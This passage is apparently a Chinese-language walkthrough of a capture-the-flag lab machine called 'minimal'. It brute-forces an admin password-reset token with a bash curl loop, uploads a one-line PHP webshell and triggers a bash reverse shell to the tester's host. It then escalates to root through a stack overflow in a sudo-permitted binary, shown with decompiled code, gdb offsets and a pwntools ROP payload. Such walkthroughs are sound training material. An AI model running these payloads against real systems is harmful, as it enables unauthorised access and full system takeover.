($insertQuery->execute()) {\n $error = false;\n $done = true;\n } else {\n $error = true;\n }\n }\n } else {\n $error = true;\n }\n}\n\nif ($_SERVER['REQUEST_METHOD'] === 'GET') {\n if (isset($_GET['user']) and isset($_GET['token']) and isset($_GET['newpass'])) {\n $user = $_GET['user'];\n $token = $_GET['token'];\n $newpass = $_GET['newpass'];\n\n \/\/ Paso 1: Verificar si el usuario y token coinciden en la tabla pass_reset\n $query = $conn->prepare("SELECT token FROM pass_reset WHERE user = ?");\n $query->bind_param("s", $user);\n $query->execute();\n $result = $query->get_result();\n\n if ($result->num_rows > 0) {\n $row = $result->fetch_assoc();\n $storedToken = $row['token'];\n\n if ($storedToken === $token) {\n \/\/ Paso 2: Actualizar la contrase\u00c3\u00b1a en la tabla users\n $updateQuery = $conn->prepare("UPDATE users SET pass = ? WHERE user = ?");\n $hashedPassword = password_hash($newpass, PASSWORD_DEFAULT);\n $updateQuery->bind_param("ss", $hashedPassword, $user);\n\n if ($updateQuery->execute()) {\n echo "Password updated";\n } else {\n echo "Error updating";\n }\n } else {\n echo "Not valid token";\n }\n } else {\n echo "Error http 418 ;) ";\n }\n }\n}\n?><\/code><\/pre>\n\u53ea\u7559\u4e0bphp\u4ee3\u7801\u4e86\uff0c\u5ba1\u8ba1\u4e00\u4e0b\u57fa\u672c\u903b\u8f91\uff1a<\/p>\n
\u751f\u6210\u4e00\u4e2a1~100\u7684\u968f\u673a\u6570\uff0c\u548cuser\u62fc\u63a5\u8d77\u6765\uff0c\u7136\u540eMD5\u52a0\u5bc6\uff0c\u7136\u540ebase64\u52a0\u5bc6\uff0c\u8fd9\u4e2a\u4f5c\u4e3atoken\uff0c\u800cuser\u5df2\u7ecf\u786e\u5b9a\u4e86\u4e3aadmin<\/code>\uff0c\u6211\u4eec\u8bd5\u51fa\u6765\u4e86\uff0c\u53ef\u4ee5\u5c1d\u8bd5\u7206\u7834\u4e00\u4e0b\uff0c\u6211\u81ea\u5df1\u4e5f\u5c1d\u8bd5\u5199\u4e86\uff0c\u5148\u62ff\u4f5c\u8005\u7684\u8bb0\u5f55\u4ee5\u4e0b\u5427\uff0c\u6807\u51c6\u7b54\u6848\u561e\uff1a<\/p>\nname="admin"\n\nfor ((i=1; i<=100; i++)); do\n nameWithNumber="${name}${i}"\n md5Hash=$(echo -n "$nameWithNumber" | md5sum | awk '{print $1}')\n base64Encoded=$(echo -n "$md5Hash" | base64)\n curl -X GET "http:\/\/172.20.10.6\/reset_pass.php?user=admin&token=$base64Encoded&newpass=patata"\ndone<\/code><\/pre>\n\u7136\u540e\u8bbf\u95ee\uff1a<\/p>\n
http:\/\/172.20.10.6\/admin.php<\/code><\/pre>\n\u4f1a\u53d8\u6210\uff1a<\/p>\n
<\/div><\/p>\n\u7136\u540e\u968f\u4fbf\u4e0a\u4f20\u4e00\u4e2awebshell\u5373\u53ef\uff1a<\/p>\n
<?php system($_GET["hack"]);?><\/code><\/pre>\n<\/div><\/p>\n\u7136\u540e\u53cd\u5f39\u8fc7\u6765\uff1a<\/p>\n
http:\/\/172.20.10.6\/imgs\/shell.php?hack=bash -c "bash -i >%26 \/dev\/tcp\/172.20.10.8\/1234 0>%261"<\/code><\/pre>\n<\/div><\/p>\n\u63d0\u6743<\/h2>\n\u4fe1\u606f\u641c\u96c6<\/h3>\n(remote) www-data@minimal:\/var\/www\/html\/imgs$ whoami;id\nwww-data\nuid=33(www-data) gid=33(www-data) groups=33(www-data)\n(remote) www-data@minimal:\/var\/www\/html\/imgs$ whoami\nwww-data\n(remote) www-data@minimal:\/var\/www\/html\/imgs$ sudo -l\nMatching Defaults entries for www-data on minimal:\n env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin\\:\/snap\/bin, use_pty\n\nUser www-data may run the following commands on minimal:\n (root) NOPASSWD: \/opt\/quiz\/shop\n(remote) www-data@minimal:\/var\/www\/html\/imgs$ file \/opt\/quiz\/shop\n\/opt\/quiz\/shop: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter \/lib64\/ld-linux-x86-64.so.2, BuildID[sha1]=c12ae144027d5fe72a74c6af34ff0619064a699f, for GNU\/Linux 3.2.0, not stripped\n(remote) www-data@minimal:\/var\/www\/html\/imgs$ cd \/opt\/quiz\n(remote) www-data@minimal:\/opt\/quiz$ ls -la\ntotal 36\ndrwxr-xr-x 2 root root 4096 Nov 5 10:18 .\ndrwxr-xr-x 3 root root 4096 Nov 1 22:09 ..\n-rw------- 1 root root 2236 Nov 1 22:18 prize.txt\n-rw-r--r-- 1 root root 27 Nov 1 22:19 results.txt\n-rwxrwxr-x 1 root root 16632 Nov 5 10:18 shop\n(remote) www-data@minimal:\/opt\/quiz$ cat prize.txt \ncat: prize.txt: Permission denied\n(remote) www-data@minimal:\/opt\/quiz$ cat results.txt \nUser: 0xH3rshel\nPoints: 3\n\n(remote) www-data@minimal:\/opt\/quiz$ .\/shop\nHey guys, I have prepared this little program to find out how much you know about me, since I have been your administrator for 2 years.\nIf you get all the questions right, you win a teddy bear and if you don't, you win a teddy bear and if you don't, you win trash\nWhat is my favorite OS?\nlinux\nCorrect!!\nWhat is my favorite food?\naaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\nNope!!\nWhat is my favorite text editor?\nNope!!\nUse sudo pls :)\n(remote) www-data@minimal:\/opt\/quiz$ .\/shop\nHey guys, I have prepared this little program to find out how much you know about me, since I have been your administrator for 2 years.\nIf you get all the questions right, you win a teddy bear and if you don't, you win a teddy bear and if you don't, you win trash\nWhat is my favorite OS?\naaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\nNope!!\nSegmentation fault (core dumped)<\/code><\/pre>\n\u53cd\u7f16\u8bd1<\/h3>\n
\u53d1\u73b0\u5b58\u5728\u6808\u6ea2\u51fa\u6f0f\u6d1e\u3002\u6587\u4ef6\u4e0b\u8f7d\u5230\u672c\u5730\u6765\u8fdb\u884c\u53cd\u7f16\u8bd1\uff1a<\/p>\n
# main.c\nint __cdecl main(int argc, const char **argv, const char **envp)\n{\n __int64 v3; \/\/ rbp\n __int64 v4; \/\/ rdx\n signed __int64 v6; \/\/ [rsp-28h] [rbp-28h]\n signed int v7; \/\/ [rsp-20h] [rbp-20h]\n unsigned int v8; \/\/ [rsp-1Ch] [rbp-1Ch]\n const char *v9; \/\/ [rsp-18h] [rbp-18h]\n const char *v10; \/\/ [rsp-10h] [rbp-10h]\n __int64 v11; \/\/ [rsp-8h] [rbp-8h]\n\n __asm { endbr64 }\n v11 = v3;\n v6 = 3347146957242197362LL;\n v7 = 7633012;\n v10 = "Hey guys, I have prepared this little program to find out how much you know about me, since I have been your adm"\n "inistrator for 2 years.";\n v9 = "If you get all the questions right, you win a teddy bear and if you don't, you win a teddy bear and if you don't, you win trash";\n sub_4010C0(\n "Hey guys, I have prepared this little program to find out how much you know about me, since I have been your adminis"\n "trator for 2 years.",\n argv,\n envp);\n sub_4010C0(\n "If you get all the questions right, you win a teddy bear and if you don't, you win a teddy bear and if you don't, you win trash",\n argv,\n v4);\n v8 = question_1();\n v8 += question_2();\n v8 += question_3();\n writeResults(&v6, v8);\n if ( v8 == 3 )\n print_prize(3LL);\n if ( foo == 85 )\n wait_what();\n return 0;\n}<\/code><\/pre>\n\/\/ question1\nbool question_1(void)\n{\n int32_t iVar1;\n char *s1;\n\n puts("What is my favorite OS?");\n fgets(&s1, 200, _stdin);\n iVar1 = strcmp(&s1, "linux\\n");\n if (iVar1 != 0) {\n puts("Nope!!");\n } else {\n puts("Correct!!");\n }\n return iVar1 == 0;\n}\n<\/code><\/pre>\n\/\/ question2\nsigned __int64 __usercall question_2@<rax>(__int64 a1@<rdx>, __int64 a2@<rbp>, __int64 a3@<rsi>)\n{\n __int64 v3; \/\/ rdx\n signed __int64 result; \/\/ rax\n __int64 v5; \/\/ [rsp-88h] [rbp-88h]\n __int64 v6; \/\/ [rsp-18h] [rbp-18h]\n unsigned int v7; \/\/ [rsp-Ch] [rbp-Ch]\n __int64 v8; \/\/ [rsp-8h] [rbp-8h]\n\n __asm { endbr64 }\n v8 = a2;\n sub_4010C0("What is my favorite food?", a3, a1);\n sub_401110(&v5, 100LL, _bss_start);\n v7 = 5; \/\/ \u504f\u79fb\u91cf\n v6 = sub_4010E0();\n if ( v6 && *((_BYTE *)&v8 + v6 - 129) == 10 )\n *((_BYTE *)&v8 + v6 - 129) = 0;\n secret_q2(&v5, v7);\n if ( (unsigned int)sub_401120(&v5, "gfhts ufshfpjx") )\n {\n sub_4010C0("Nope!!", "gfhts ufshfpjx", v3);\n result = 0LL;\n }\n else\n {\n sub_4010C0("Correct!!", "gfhts ufshfpjx", v3);\n result = 1LL;\n }\n return result;\n}<\/code><\/pre>\n\/\/ question3\nbool question_3(void)\n{\n int32_t iVar1;\n char *s1;\n int64_t var_ch;\n\n puts("What is my favorite text editor?");\n fgets(&s1, 100, _stdin);\n var_ch._0_4_ = 6;\n secret_q3((char *)&s1, 6);\n iVar1 = strcmp(&s1, "hpok&qorn&vjsaohu\\n");\n if (iVar1 != 0) {\n puts("Nope!!");\n } else {\n puts("Correct!!");\n }\n return iVar1 == 0;\n}<\/code><\/pre>\n__int64 __usercall print_prize@<rax>(__int64 a1@<rbp>)\n{\n __int64 result; \/\/ rax\n __int64 v2; \/\/ [rsp-8h] [rbp-8h]\n\n __asm { endbr64 }\n v2 = a1;\n result = sub_4010F0("cat .\/prize.txt");\n if ( (_DWORD)result == -1 )\n result = sub_401100("Error");\n return result;\n}<\/code><\/pre>\n__int64 __fastcall secret_q3(__int64 a1, char a2)\n{\n __int64 result; \/\/ rax\n int v3; \/\/ [rsp-10h] [rbp-10h]\n signed int i; \/\/ [rsp-Ch] [rbp-Ch]\n\n __asm { endbr64 }\n v3 = sub_4010E0();\n for ( i = 0; ; ++i )\n {\n result = (unsigned int)(v3 - 1);\n if ( i >= (signed int)result )\n break;\n *(_BYTE *)(i + a1) ^= a2;\n }\n return result;\n}<\/code><\/pre>\n\u5927\u6982\u610f\u601d\u5c31\u662f\u56de\u7b54\u4e09\u4e2a\u95ee\u9898\uff0c\u90fd\u5bf9\u4e86\u5c31cat .\/prize.txt<\/code>\uff0c\u8fd9\u6b21\u7684IDA\u53cd\u7f16\u8bd1\u7684\u4e00\u5305\u6405\uff0c\u4e0a\u9762\u7684\u4ee3\u7801\u90e8\u5206\u662fIDA\uff0c\u90e8\u5206\u662fcutter\u7f16\u8bd1\u51fa\u6765\u7684\u3002<\/p>\n\u5c1d\u8bd5\u89e3\u5bc6<\/h3>\n\u7b2c\u4e00\u4e2a\u95ee\u9898\u7b54\u6848\u662flinux\u6beb\u65e0\u7591\u95ee<\/h4>\nlinux<\/code><\/pre>\n\u7b2c\u4e8c\u4e2a<\/h4>\n
\u770b\u8d77\u6765\u50cf\u662f\u51ef\u6492\u52a0\u5bc6\uff0c\u504f\u79fb\u91cf\u4e3a5<\/p>\n
<\/div><\/p>\nbacon pancakes<\/code><\/pre>\n\u7b2c\u4e09\u4e2a<\/h4>\n
\u770b\u90a3\u4e2asecret_q3<\/code>\uff0c\u50cf\u662f\u5728\u8fdb\u884cXOR\uff1a<\/p>\n<\/div><\/p>\n\u5f97\u5230\u7ed3\u679c\uff1a<\/p>\n
nvim with plugins<\/code><\/pre>\n\u65b9\u6cd5\u4e00\uff1a\u6784\u9020ROP\u94fe<\/h3>\n
\u672c\u9898\u4e0d\u5b58\u5728python\u65e0\u8bba\u662f2\u8fd8\u662f3\uff0c\u90fd\u6ca1\u6709\uff0c\u6211\u4eec\u5982\u679c\u60f3\u8981\u62ffpwntool\u53bb\u6253\uff0c\u53ea\u80fd\u9009\u62e9\u5c06\u5176\u6620\u5c04\u5230\u67d0\u4e2a\u7aef\u53e3\uff0c\u7136\u540e\u4ece\u672c\u5730\u4e3b\u673a\u53bb\u6253\uff1a<\/p>\n
socat tcp-l:\u7aef\u53e3\u53f7\uff0cfork exec:\u7a0b\u5e8f\u4f4d\u7f6e\uff0creuseaddr\n \u4f8b\u5982\uff1a\n socat tcp-l:6666,fork exec:.\/pwn,reuseaddr<\/code><\/pre>\n\u7136\u540e\u4f7f\u7528python\u53bb\u6253\uff01\u6211\u4eec\u5148\u4e0a\u4f20\u4e00\u4e2asocat\uff0c\u8d4b\u4e88\u5176\u6267\u884c\u6743\u9650\uff0c\u7136\u540e<\/p>\n
.\/socat TCP-LISTEN:8000 EXEC:'sudo \/opt\/quiz\/shop'<\/code><\/pre>\n\n\u6784\u9020ROP\u94fe\u662f\u6307\u5728\u6808\u7f13\u51b2\u533a\u6ea2\u51fa\u7684\u57fa\u7840\u4e0a\uff0c\u5229\u7528\u7a0b\u5e8f\u4e2d\u5df2\u6709\u7684\u5c0f\u7247\u6bb5\uff08gadgets\uff09\u6765\u6539\u53d8\u67d0\u4e9b\u5bc4\u5b58\u5668\u6216\u8005\u53d8\u91cf\u7684\u503c\uff0c\u4ece\u800c\u63a7\u5236\u7a0b\u5e8f\u7684\u6267\u884c\u6d41\u7a0b<\/strong>\u3002<\/p>\n<\/blockquote>\n\u67e5\u770b\u4e00\u4e0b\u6587\u4ef6\u7684\u57fa\u7840\u4fe1\u606f\uff1a<\/p>\n
\u250c\u2500\u2500(root\u327fkali)-[\/home\/kali\/temp\/minimal]\n\u2514\u2500# file shop \nshop: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter \/lib64\/ld-linux-x86-64.so.2, BuildID[sha1]=c12ae144027d5fe72a74c6af34ff0619064a699f, for GNU\/Linux 3.2.0, not stripped\n\n\u250c\u2500\u2500(root\u327fkali)-[\/home\/kali\/temp\/minimal]\n\u2514\u2500# pwn checksec shop \n[*] '\/home\/kali\/temp\/minimal\/shop'\n Arch: amd64-64-little\n RELRO: Partial RELRO\n Stack: No canary found\n NX: NX enabled\n PIE: No PIE (0x400000)<\/code><\/pre>\n(remote) www-data@minimal:\/opt\/quiz$ cat \/proc\/sys\/kernel\/randomize_va_space \n2<\/code><\/pre>\n\u8bf4\u660e\u5f00\u542f\u4e86\u5730\u5740\u7a7a\u95f4\u5206\u5e03\u968f\u673a\u5316(ASLR)<\/code><\/p>\n\n\n- 0\uff0c\u5173\u95ed ASLR\uff0c\u6ca1\u6709\u968f\u673a\u5316\u3002\u6808\u3001\u5806\u3001.so \u7684\u57fa\u5730\u5740\u6bcf\u6b21\u90fd\u76f8\u540c\u3002<\/li>\n
- 1\uff0c\u666e\u901a\u7684 ASLR\u3002\u6808\u57fa\u5730\u5740\u3001mmap \u57fa\u5730\u5740\u3001.so \u52a0\u8f7d\u57fa\u5730\u5740\u90fd\u5c06\u88ab\u968f\u673a\u5316\uff0c\u4f46\u662f\u5806\u57fa\u5730\u5740\u6ca1\u6709\u968f\u673a\u5316\u3002<\/li>\n
- 2\uff0c\u589e\u5f3a\u7684 ASLR\uff0c\u5728 1 \u7684\u57fa\u7840\u4e0a\uff0c\u589e\u52a0\u4e86\u5806\u57fa\u5730\u5740\u968f\u673a\u5316\u3002<\/li>\n<\/ul>\n<\/blockquote>\n
\u5bfb\u627e\u504f\u79fb\u91cf<\/h4>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/minimal]\n\u2514\u2500$ sudo chmod +x shop \n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/minimal]\n\u2514\u2500$ gdb-peda shop\nReading symbols from shop...\n(No debugging symbols found in shop)\ngdb-peda$ pattern create 300\n'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%bA%1A%GA%cA%2A%HA%dA%3A%IA%eA%4A%JA%fA%5A%KA%gA%6A%'\ngdb-peda$ run\nStarting program: \/home\/kali\/temp\/minimal\/shop \n[Thread debugging using libthread_db enabled]\nUsing host libthread_db library "\/lib\/x86_64-linux-gnu\/libthread_db.so.1".\nHey guys, I have prepared this little program to find out how much you know about me, since I have been your administrator for 2 years.\nIf you get all the questions right, you win a teddy bear and if you don't, you win a teddy bear and if you don't, you win trash\nWhat is my favorite OS?\nAAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%bA%1A%GA%cA%2A%HA%dA%3A%IA%eA%4A%JA%fA%5A%KA%gA%6A%\n[----------------------------------registers-----------------------------------]\nRAX: 0x0 \nRBX: 0x7fffffffe358 --> 0x7fffffffe5f5 ("\/home\/kali\/temp\/minimal\/shop")\nRCX: 0x7ffff7ec1ba0 (<__GI___libc_write+16>: cmp rax,0xfffffffffffff000)\nRDX: 0x0 \nRSI: 0x4052a0 ("Nope!!\\n my favorite OS?\\nions right, you win a teddy bear and if you don't, you win a teddy bear and if you don't, you win trash\\n years.\\n")\nRDI: 0x7ffff7f9fa30 --> 0x0 \nRBP: 0x41414e4141384141 ('AA8AANAA')\nRSP: 0x7fffffffe208 ("jAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAy")\nRIP: 0x40147d (<question_1+120>: ret)\nR8 : 0x0 \nR9 : 0x410 \nR10: 0x7ffff7de2e80 --> 0x10001a00007bf8 \nR11: 0x202 \nR12: 0x0 \nR13: 0x7fffffffe368 --> 0x7fffffffe612 ("SUDO_GID=1000")\nR14: 0x403e18 --> 0x401200 (<__do_global_dtors_aux>: endbr64)\nR15: 0x7ffff7ffd000 --> 0x7ffff7ffe2c0 --> 0x0\nEFLAGS: 0x10206 (carry PARITY adjust zero sign trap INTERRUPT direction overflow)\n[-------------------------------------code-------------------------------------]\n 0x401472 <question_1+109>: call 0x4010c0 <puts@plt>\n 0x401477 <question_1+114>: mov eax,0x0\n 0x40147c <question_1+119>: leave\n=> 0x40147d <question_1+120>: ret\n 0x40147e <question_2>: endbr64\n 0x401482 <question_2+4>: push rbp\n 0x401483 <question_2+5>: mov rbp,rsp\n 0x401486 <question_2+8>: add rsp,0xffffffffffffff80\n[------------------------------------stack-------------------------------------]\n0000| 0x7fffffffe208 ("jAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAy")\n0008| 0x7fffffffe210 ("AkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAy")\n0016| 0x7fffffffe218 ("AAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAy")\n0024| 0x7fffffffe220 ("RAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAy")\n0032| 0x7fffffffe228 ("ApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAy")\n0040| 0x7fffffffe230 ("AAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAy")\n0048| 0x7fffffffe238 ("VAAtAAWAAuAAXAAvAAYAAwAAZAAxAAy")\n0056| 0x7fffffffe240 ("AuAAXAAvAAYAAwAAZAAxAAy")\n[------------------------------------------------------------------------------]\nLegend: code, data, rodata, value\nStopped reason: SIGSEGV\n0x000000000040147d in question_1 ()\ngdb-peda$ pattern offset 0x000000000040147d\n4199549 not found in pattern buffer\ngdb-peda$ pattern search 0x7fffffffe208\nRegisters contain pattern buffer:\nRBP+0 found at offset: 112\nRegisters point to pattern buffer:\n[RSP] --> offset 120 - size ~79\nPattern buffer found at:\n0x004056b0 : offset 0 - size 300 ([heap])\n0x00007fffffffdf0f : offset 70 - size 17 ($sp + -0x2f9 [-191 dwords])\n0x00007fffffffe190 : offset 0 - size 199 ($sp + -0x78 [-30 dwords])\nReferences to pattern buffer found at:\n0x00007ffff7f9dab8 : 0x004056b0 (\/usr\/lib\/x86_64-linux-gnu\/libc.so.6)\n0x00007ffff7f9dac0 : 0x004056b0 (\/usr\/lib\/x86_64-linux-gnu\/libc.so.6)\n0x00007ffff7f9dac8 : 0x004056b0 (\/usr\/lib\/x86_64-linux-gnu\/libc.so.6)\n0x00007ffff7f9dad0 : 0x004056b0 (\/usr\/lib\/x86_64-linux-gnu\/libc.so.6)\n0x00007ffff7f9dad8 : 0x004056b0 (\/usr\/lib\/x86_64-linux-gnu\/libc.so.6)\n0x00007fffffffddc0 : 0x00007fffffffe190 ($sp + -0x448 [-274 dwords])\n0x00007fffffffddc8 : 0x00007fffffffe190 ($sp + -0x440 [-272 dwords])\n0x00007fffffffdde0 : 0x00007fffffffe190 ($sp + -0x428 [-266 dwords])<\/code><\/pre>\n\u504f\u79fb\u91cf\u4e3a120\uff01<\/p>\n
gadgets<\/h4>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/minimal]\n\u2514\u2500$ ropper --search 'pop rdi' -f shop 2>\/dev\/null\n\n0x00000000004015dd: pop rdi; ret;<\/code><\/pre>\n\u67e5\u770b\u7cfb\u7edf\u8c03\u7528<\/h4>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/minimal]\n\u2514\u2500$ objdump -D shop | grep system\n00000000004010f0 <system@plt>:\n 4010f4: f2 ff 25 35 2f 00 00 bnd jmp *0x2f35(%rip) # 404030 <system@GLIBC_2.2.5>\n 40124f: e8 9c fe ff ff call 4010f0 <system@plt><\/code><\/pre>\n\u5bfb\u627esh\u5730\u5740<\/h4>\ngdb-peda$ find sh\nSearching for 'sh' in: None ranges\nFound 123 results, display max 123 items:\n shop : 0x402070 --> 0x786a70666873 ('shfpjx')\n shop : 0x4021f5 --> 0x743b031b01006873 \n shop : 0x403070 --> 0x786a70666873 ('shfpjx')\n shop : 0x4031f5 --> 0x743b031b01006873 \n [heap] : 0x40531d ("sh\\n years.\\n")<\/code><\/pre>\n\u8fd9\u4fe9\u90fd\u662f0x4021f5<\/code>\u548c0x4031f5<\/code><\/p>\n\u7136\u540e\u5c1d\u8bd5\u7f16\u5199payload:<\/p>\n
from pwn import *\n\nr = remote('192.168.0.183', 8000)\n\njump = b"A"*120\nsystem_addr = p64(0x40124f)\npop_rdi = p64(0x4015dd)\nsh_addr = p64(0x4021f5)\n\npayload = jump + pop_rdi + sh_addr + system_addr \nr.sendline(payload)\nr.interactive()<\/code><\/pre>\n\u7136\u540e\u8fd0\u884c\u62ff\u5230shell\uff1a<\/p>\n
![\"image-20240404180849025\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404162156640.png\")
<\/div>![\"image-20240404180900291\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404162156641.png\")
<\/div><\/p>\n![\"image-20240404180930892\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404162156642.png\")
<\/div><\/p>\n![\"image-20240404181058140\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404162156643.png\")
<\/div><\/p>\n![\"image-20240404181134404\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404162156644.png\")
<\/div>![\"image-20240404181354236\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404162156645.png\")
<\/div><\/p>\n![\"image-20240404181723846\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404162156646.png\")
<\/div>![\"image-20240404181740869\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404162156647.png\")
<\/div><\/p>\n![\"image-20240404181758883\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404162156648.png\")
<\/div><\/p>\n![\"image-20240404182338946\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404162156650.png\")
<\/div><\/p>\n![\"image-20240404182837239\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404162156651.png\")
<\/div><\/p>\n![\"image-20240404182658449\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404162156652.png\")
<\/div><\/p>\n![\"image-20240404190027465\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404162156653.png\")
